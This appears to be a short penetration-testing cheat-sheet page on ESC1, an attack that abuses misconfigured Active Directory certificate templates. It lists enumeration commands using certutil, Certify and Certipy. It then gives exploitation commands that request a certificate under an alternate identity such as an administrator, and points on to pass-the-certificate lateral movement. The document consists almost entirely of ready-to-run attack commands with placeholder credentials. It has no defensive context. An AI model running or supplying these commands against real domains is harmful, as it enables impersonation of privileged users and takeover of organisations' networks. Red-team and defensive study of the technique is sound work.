# ESC1 - Misconfigured Certificate Templates

## Enumeration

* certutil -v -dsTemplate
* certify.exe find \[/vulnerable]
* certipy find -u USER\@DOMAIN -p PASSWORD -dc-ip DOMAIN\_CONTROLLER

## Exploitation

* certipy req -u USER\@DOMAIN -p PASSWORD -target CA\_SERVER -template 'VULNERABLE\_TEMPLATE\_NAME' -ca CA\_NAME -upn TARGET\_USER\@DOMAIN (Linux)
* certify.exe request /ca:SERVER\CA\_NAME /template:"VULNERABLE\_TEMPLATE\_NAME" \[/altname:"Admin"] (Windows)

### With this attack, we now perform Pass the Certificate Lateral Movement